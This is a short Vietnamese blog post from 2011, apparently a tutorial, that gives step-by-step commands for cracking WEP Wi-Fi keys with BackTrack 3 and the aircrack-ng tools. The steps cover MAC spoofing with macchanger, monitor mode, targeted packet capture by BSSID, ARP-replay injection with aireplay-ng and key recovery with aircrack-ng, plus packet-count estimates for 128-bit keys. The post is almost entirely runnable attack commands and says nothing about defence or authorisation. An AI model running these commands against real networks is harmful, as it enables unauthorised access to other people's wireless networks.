Custom Search



Nơi bạn đến là nơi tôi bắt đầu, nơi tôi qua sẽ là nơi bạn đến...

Wednesday, October 19, 2011

Hack wireless by backtrack 3

Bước1: Start chương trình airmon-ng để đổi địa chỉ MAC address của card wireless bằng các câu lệnh
Airmon-ng stop ath0
Ifconfig wifi0 down
Macchanger --mac 00:11:22:33:55 wifi0
Xem hình minh hoạ:



Bước 2: chuyển card wireless về chế độ monitor bằng lệnh:
Airmon-ng start wifi0



Bước 3: Dò và xác định các thông số của AP target bằng chương trình airodump-ng
Airodump-ng ath0
kết qủa dò tìm như hình sau. Ta chú ý các thông số BSSID, kênh, kiểu mã hoá.



Bước 4: Dùng airodump-ng để capture gói tin dựa vào các thông số trên bằng lệnh:
airodump-ng -c 1 –w/root/desktop/capture/wep64 –bssid 00:14:bf:05:d6:0c ath0
-c 1 : kênh phát của AP target là kênh 1
/root/desktop/capture/wep64: đường dẫn lưu file capture
00:14:bf:05:d6:0c : MAC address của AP target



Bước 5: Dùng chương trình aireplay-ng để tim gói đến AP nhằm tăng lưu lượng gói để capture nhanh hơn.
Aireplay-ng -3 -b 00:14:bf:05:d6:0c –h 00:11:22:33:55 ath0
Quá trình tim gói như hình sau:



Trở lại màn hình airodump để quan sát quá trình bắt gói. Trong bài lap này, với số gói là 10333 (mất khoảng 15s ) thì có thể tìm được khoá




Dùng chương trình aircrack-ng để tìm ra khoá.
Aircrack-ng –n 64 --bssid 00:14:bf:05:d6:0c /root/desktop/capture/wep64-01.cap
Quan sát quá trình phân tích và tìm khoá như hình sau:




CRACK WEP KEY 128 BITS:

Quá trình crack wep 128 bits bao gồm các bước thực hiện hoàn toàn tương tự như việc crack wep 64 bits. Chỉ khác là ta cần capture nhiều gói tin hơn. Để crack được wep 128 bits, ta cần tối thiểu khoảng 1100000 packets (mất khoảng 40 phút và cần khoảng 5000 ivs).



Post a Comment